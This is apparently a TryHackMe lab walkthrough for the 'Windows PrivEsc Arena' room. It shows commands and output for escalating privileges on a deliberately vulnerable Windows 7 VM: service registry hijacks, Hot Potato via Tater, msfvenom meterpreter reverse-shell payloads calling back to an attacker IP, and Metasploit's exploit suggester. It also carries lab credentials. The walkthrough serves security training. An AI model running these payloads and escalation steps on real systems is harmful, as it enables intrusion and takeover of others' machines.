đŸš©
THM Walkthroughs
  • THM Walkthroughs
    • đŸ§‘â€đŸ«Tutorial
  • 🟩Difficulty: Info
    • 🔌What is Networking?
    • 🔌Intro to LAN
    • 🐧Linux Fundamentals
      • 🐧Linux Fundamentals Part 1
        • Task 2 - A Bit of Background on Linux
        • Task 4 - Running Your First few Commands
        • Task 5 - Interacting With the Filesystem!
        • Task 6 - Searching for Files
        • Task 7 - An Introduction to Shell Operators
      • 🐧Linux Fundamentals Part 2
        • Task 3 - Introduction to Flags and Switches
        • Task 4 - Filesystem Interaction Continued
        • Task 5 - Permissions 101
        • Task 6 - Common Directories
      • 🐧Linux Fundamentals Part 3
        • Task 3 - Terminal Text Editors
        • Task 4 - General/Useful Utilities
        • Task 5 - Processes 101
        • Task 6 - Maintaining Your System: Automation
        • Task 8 - Maintaining Your System: Logs
    • đŸȘŸWindows Fundamentals
      • đŸȘŸWindows Fundamentals 1
      • đŸȘŸWindows Fundamentals 2
      • đŸȘŸWindows Fundamentals 3
    • 🔓Principles of Security
    • 🐍Python Basics
    • 🔍History of Malware
    • đŸŠčCommon Attacks
    • đŸ–„ïžSecurity Awareness
    • ⚔Intro to Offensive Security
    • đŸŠčPentesting Fundamentals
    • 🔓CVE Walkthroughs
      • đŸ–„ïžSudo Security Bypass: CVE-2019-14287
      • đŸ–„ïžSudo Buffer Overflow: CVE-2019-18634
      • đŸ–„ïžBaron Samedit: CVE-2021-3156
      • đŸ–„ïžOverlayFS: CVE-2021-3493
      • đŸ–„ïžPolkit: CVE-2021-3560
      • đŸ–„ïžPwnkit: CVE-2021-4034
      • đŸȘ¶Apache HTTP Server Path Traversal: CVE-2021-41773/42013
      • đŸ§»Dirty Pipe: CVE-2022-0847
      • 🟱Spring4Shell: CVE-2022-22965
    • 🟧Burp Suite
      • 🟧Burp Suite: The Basics
      • 🟧Burp Suite: Repeater
    • 🏁Challenges
      • ‎Bypass Disable Functions
    • đŸŽŸïžTHM PROMOs
      • đŸŽŸïžLearn and win prizes [PROMO ENDED]
      • đŸŽŸïžLearn and win prizes #2 [PROMO ENDED]
  • đŸŸ©Difficulty: Easy
    • 🚀Learning Cyber Security
    • 🔁The Hacker Methodology
    • 🔍Google Dorking
      • Task 2 - Let's Learn About Crawlers
      • Task 4 - Beepboop - Robots.txt
      • Task 5 - Sitemaps
      • Task 6 - What is Google Dorking?
    • 🐝OWASP Top 10
      • Task 5 - Command Injection Practical
      • Task 7 - Broken Authentication Practical
      • Task 11 - Sensitive Data Exposure (Challenge)
      • Task 13 - XML External Entity - eXtensible Markup Language
      • Task 14 - XML External Entity - DTD
      • Task 16 - XML External Entity - Exploiting
      • Task 18 - Broken Access Control (IDOR Challenge)
      • Task 19 - Security Misconfiguration
      • Task 20 - Cross-site Scripting
      • Task 21 - Insecure Deserialization
      • Task 24 - Insecure Deserialization - Cookies
      • Task 25 - Insecure Deserialization - Cookies Practical
      • Task 30 - Insufficient Logging and Monitoring
    • 📡Nmap
      • Task 2 - Introduction
      • Task 3 - Nmap Switches
      • Task 5 - TCP Connect Scans
      • Task 6 - Scan Types SYN Scans
      • Task 7 - UDP Scans
      • Task 8 - NULL, FIN and Xmas
      • Task 9 - ICMP Network Scanning
      • Task 10 - NSE Scripts Overview
      • Task 11 - Working with the NSE
      • Task 12 - Searching for Scripts
      • Task 13 - Firewall Evasion
      • Task 14 - Practical
    • 📡RustScan
      • Task 2 - Installing RustScan
      • Task 5 - Extensible
      • Task 7 - Scanning Time!
      • Task 8 - RustScan Quiz
    • 🐙Crack the hash
    • 🌍OhSINT
    • 🧑‍🚀Vulnversity
    • 🧊Ice
    • đŸȘŸBlue
    • 🎄Advent of Cyber 4 (2022)
  • 🟹Difficulty: Medium
    • đŸȘŸAttacktive Directory
      • Task 3 - Welcome to Attacktive Directory
      • Task 4 - Enumerating Users via Kerberos
      • Task 5 - Abusing Kerberos
      • Task 6 - Back to the Basics
      • Task 7 - Elevating Privileges within the Domain
      • Task 8 - Flag Submission Panel
    • 💀Mr Robot CTF
    • 🛗Linux PrivEsc
    • 🛗Linux PrivEsc Arena [WIP]
    • 🛗Windows PrivEsc Arena
  • 🟧Difficulty: Hard
    • 🐘Hacking Hadoop [WIP]
  • đŸŸ„Difficulty: Insane
    • â›șYou're in a cave [WIP]
  • Blank Room (Duplicate Me)
Powered by GitBook
On this page
  • Task 1 Connecting to TryHackMe network
  • Connect to TryHackMe's VPN.
  • Task 2 Deploy the vulnerable machine
  • Deploy the machine and log into the user account via RDP
  • Open a command prompt and run 'net user'. Who is the other non-default user on the machine?
  • Task 3 Registry Escalation - Autorun
  • Task 4 Registry Escalation - AlwaysInstallElevated
  • Task 5 Service Escalation - Registry
  • Task 6 Service Escalation - Executable Files
  • Task 7 Privilege Escalation - Startup Applications
  • Task 8 Service Escalation - DLL Hijacking
  • Task 9 Service Escalation - binPath
  • Task 10 Service Escalation - Unquoted Service Paths
  • Task 11 Potato Escalation - Hot Potato
  • Task 12 Password Mining Escalation - Configuration Files
  • Task 13 Password Mining Escalation - Memory
  • Task 14 Privilege Escalation - Kernel Exploits
  1. Difficulty: Medium

Windows PrivEsc Arena

Students will learn how to escalate privileges using a very vulnerable Windows 7 VM. RDP is open. Your credentials are user:password321

PreviousLinux PrivEsc Arena [WIP]NextDifficulty: Hard

Last updated 2 years ago

Room Attributes
Value

Subscription Required

False [Free]

Type

Walkthroughs

Difficulty

Medium

Tags

Security, Windows, PrivEsc

Task 1 Connecting to TryHackMe network

Connect to TryHackMe's VPN.

No answer needed

Task 2 Deploy the vulnerable machine

Deploy the machine and log into the user account via RDP

rdesktop TARGET_IP:3389 -u user -p password321

No answer needed

Open a command prompt and run 'net user'. Who is the other non-default user on the machine?

Task 3 Registry Escalation - Autorun

C:\Users\user>C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Pro
gram Files\Autorun Program"

Accesschk v6.10 - Reports effective permissions for securable objects
Copyright (C) 2006-2016 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\Program Files\Autorun Program\program.exe
  Medium Mandatory Level (Default) [No-Write-Up]
  RW Everyone
        FILE_ALL_ACCESS
  RW NT AUTHORITY\SYSTEM
        FILE_ALL_ACCESS
  RW BUILTIN\Administrators
        FILE_ALL_ACCESS
meterpreter > getuid
Server username: TCM-PC\TCM

No answer needed

Task 4 Registry Escalation - AlwaysInstallElevated

PS C:\Users\TCM> Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl

Path   : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\regsvc
Owner  : BUILTIN\Administrators
Group  : NT AUTHORITY\SYSTEM
Access : Everyone Allow  ReadKey
         NT AUTHORITY\INTERACTIVE Allow  FullControl
         NT AUTHORITY\SYSTEM Allow  FullControl
         BUILTIN\Administrators Allow  FullControl
Audit  :
Sddl   : O:BAG:SYD:P(A;CI;KR;;;WD)(A;CI;KA;;;IU)(A;CI;KA;;;SY)(A;CI;KA;;;BA)

No answer needed

Task 5 Service Escalation - Registry

C:\Users\TCM>reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath
/t REG_EXPAND_SZ /d c:\temp\x.exe /f
The operation completed successfully.
C:\Users\TCM>sc start regsvc

SERVICE_NAME: regsvc
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0
        PID                : 3400
        FLAGS              :

No answer needed

Task 6 Service Escalation - Executable Files

No answer needed

Task 7 Privilege Escalation - Startup Applications

C:\Users\TCM>icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup BUILTIN\Users:(F)
    TCM-PC\TCM:(I)(OI)(CI)(DE,DC)
    NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
    BUILTIN\Administrators:(I)(OI)(CI)(F)
    BUILTIN\Users:(I)(OI)(CI)(RX)
    Everyone:(I)(OI)(CI)(RX)
kali@kali  ~/Documents/THM/windowsprivescarena  msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.9.12.198 -f exe -o x.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
Saved as: x.exe
C:\Users\user>net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members
-------------------------------------------------------------------------------
Administrator
TCM
user
The command completed successfully.

No answer needed

Task 8 Service Escalation - DLL Hijacking

No answer needed

Task 9 Service Escalation - binPath

C:\Users\user>C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wuvc daclsvc

Accesschk v6.10 - Reports effective permissions for securable objects
Copyright (C) 2006-2016 Mark Russinovich
Sysinternals - www.sysinternals.com

daclsvc
  Medium Mandatory Level (Default) [No-Write-Up]
  RW NT AUTHORITY\SYSTEM
        SERVICE_ALL_ACCESS
  RW BUILTIN\Administrators
        SERVICE_ALL_ACCESS
  RW Everyone
        SERVICE_QUERY_STATUS
        SERVICE_QUERY_CONFIG
        SERVICE_CHANGE_CONFIG
        SERVICE_INTERROGATE
        SERVICE_ENUMERATE_DEPENDENTS
        SERVICE_START
        SERVICE_STOP
        READ_CONTROL

No answer needed

Task 10 Service Escalation - Unquoted Service Paths

C:\Users\user>sc qc unquotedsvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: unquotedsvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Unquoted Path Service\Common Files
\unquotedpathservice.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Unquoted Path Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

No answer needed

Task 11 Potato Escalation - Hot Potato

Windows PowerShell
Copyright (C) 2009 Microsoft Corporation. All rights reserved.

PS C:\Users\user> powershell.exe -nop -ep bypass
Windows PowerShell
Copyright (C) 2009 Microsoft Corporation. All rights reserved.

PS C:\Users\user> Import-Module C:\Users\User\Desktop\Tools\Tater\Tater.ps1
PS C:\Users\user> Invoke-Tater -Trigger 1 -Command "net localgroup administrators user /add"
2022-06-26T13:24:46 - Tater (Hot Potato Privilege Escalation) started
Local IP Address = 10.10.99.186
Spoofing Hostname = WPAD
Windows Defender Trigger Enabled
Real Time Console Output Enabled
Run Stop-Tater to stop Tater early
Use Get-Command -Noun Tater* to show available functions
Press any key to stop real time console output

2022-06-26T13:24:46 - Flushing DNS resolver cache
2022-06-26T13:24:46 - Waiting for incoming HTTP connection
2022-06-26T13:24:48 - Starting NBNS spoofer to resolve WPAD to 127.0.0.1
2022-06-26T13:24:50 - WPAD has been spoofed to 127.0.0.1
2022-06-26T13:24:50 - Running Windows Defender signature update
2022-06-26T13:24:51 - HTTP request for /wpad.dat received from 127.0.0.1
2022-06-26T13:24:55 - Attempting to redirect to http://localhost:80/gethashes and trigger relay
2022-06-26T13:24:55 - HTTP request for http://download.windowsupdate.com/v9/windowsupdate/redir/muv4wuredir.cab?2206261
724 received from 127.0.0.1
2022-06-26T13:24:59 - HTTP request for /GETHASHES received from 127.0.0.1
2022-06-26T13:25:00 - HTTP to SMB relay triggered by 127.0.0.1
2022-06-26T13:25:00 - Grabbing challenge for relay from 127.0.0.1
2022-06-26T13:25:00 - Received challenge DA38D881138086D0 for relay from 127.0.0.1
2022-06-26T13:25:00 - Providing challenge DA38D881138086D0 for relay to 127.0.0.1
2022-06-26T13:25:01 - Sending response for \ for relay to 127.0.0.1
2022-06-26T13:25:01 - HTTP to SMB relay authentication successful for \ on 127.0.0.1
2022-06-26T13:25:01 - SMB relay service TGPVBCIOUBVVLFQRJQFL created on 127.0.0.1
2022-06-26T13:25:01 - Command likely executed on 127.0.0.1
2022-06-26T13:25:01 - SMB relay service TGPVBCIOUBVVLFQRJQFL deleted on 127.0.0.1
2022-06-26T13:25:02 - Stopping HTTP listener
2022-06-26T13:25:05 - Tater was successful and has exited
PS C:\Users\user> net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members
-------------------------------------------------------------------------------
Administrator
TCM
user
The command completed successfully.

No answer needed

Task 12 Password Mining Escalation - Configuration Files

<AutoLogon>
    <Password>
        <Value>cGFzc3dvcmQxMjM=</Value>
        <PlainText>false</PlainText>
    </Password>
    <Enabled>true</Enabled>
    <Username>Admin</Username>
</AutoLogon>

Task 13 Password Mining Escalation - Memory

No answer needed

Task 14 Privilege Escalation - Kernel Exploits

kali@kali  ~/Documents/THM/windowsprivescarena  msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.9.12.198 -f exe > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
meterpreter > run post/multi/recon/local_exploit_suggester

[*] 10.10.99.186 - Collecting local exploits for x86/windows...
[*] 10.10.99.186 - 40 exploit checks are being tried...
[+] 10.10.99.186 - exploit/windows/local/ikeext_service: The target appears to be vulnerable.
[+] 10.10.99.186 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.99.186 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.99.186 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.99.186 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.99.186 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.99.186 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.99.186 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[+] 10.10.99.186 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[+] 10.10.99.186 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[+] 10.10.99.186 - exploit/windows/local/tokenmagic: The target appears to be vulnerable.

No answer needed

Reveal Flag
Reveal Flag

TCM

password123

🟹
🛗
đŸš©
đŸš©
đŸš©
đŸš©
CyberChef
https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true,false)&input=Y0dGemMzZHZjbVF4TWpNPQ
Logo
TryHackMe | Windows PrivEsc ArenaTryHackMe
rdesktop | Kali Linux ToolsKali Linux
https://tryhackme.com/room/windowsprivescarena
https://www.kali.org/tools/rdesktop/
Logo
Logo